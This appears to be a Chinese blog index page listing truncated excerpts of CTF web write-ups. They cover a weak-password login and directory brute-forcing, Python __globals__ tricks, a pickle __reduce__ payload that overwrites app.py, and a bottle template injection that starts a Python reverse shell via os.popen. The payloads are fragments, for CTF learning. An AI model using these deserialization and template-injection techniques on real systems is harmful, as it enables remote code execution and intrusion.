摘要:
openharmony ctf web1 其实就是打的逻辑漏洞 php的但是卡了很久在那个.htaccess后面发现是没啥用的来看 登录框处弱口令 user password123 爆破二级目录 secrettttts得到 token.txt 发现鉴权脚本 生成auth_token: <?php / 阅读全文
posted @ 2025-06-16 15:53
Echair
阅读(79)
评论(0)
推荐(1)
摘要:
0x00先来点python的一些知识 __globals__ : `__globals__` 是 **函数的内置属性**,用于访问全局变量 __dict__ : `__dict__` 是一个**特殊属性**,用于存储对象(或类)Python 对象的**可写属性集合** __dir__ :`__dir 阅读全文
posted @ 2025-06-16 15:48
Echair
阅读(60)
评论(2)
推荐(1)
摘要:
pickle反序列化 python的很多危险来源都是这个pickle pickle时用来序列化和反序列化的 payloads 0 利用cp 覆盖app.py import pickle import base64 import subprocess class A(): def __reduce__ 阅读全文
posted @ 2025-06-16 14:40
Echair
阅读(64)
评论(4)
推荐(1)
摘要:
bottle模板框架注入 在simpletemplate框架下支持用%来使用python 代码 本来是bottle框架是会有ssti的 但过滤掉了花括号就可以用这个方法 方法0(单行python反弹) 弹shell: %__import__('os').popen("python3 -c 'impo 阅读全文
posted @ 2025-06-16 14:23
Echair
阅读(183)
评论(3)
推荐(1)
浙公网安备 33010602011771号